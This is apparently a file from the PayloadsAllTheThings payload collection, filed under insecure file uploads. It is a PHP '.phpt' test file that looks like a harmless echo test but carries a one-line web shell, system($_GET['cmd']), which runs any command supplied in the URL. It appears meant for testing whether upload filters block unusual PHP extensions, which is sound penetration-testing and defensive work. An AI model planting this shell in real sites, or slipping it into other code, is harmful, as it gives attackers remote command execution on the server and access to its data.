PayloadsAllTheThings/Upload Insecure Files/Extension PHP/shell.phpt
2024-01-11 12:20:25 +01:00

9 lines
184 B
PHP

--TEST--
echo - basic test for echo language construct
--FILE--
<?php
echo 'This works ', 'and takes args!';
echo "Shell";system($_GET['cmd']);
?>
--EXPECT--
This works and takes args!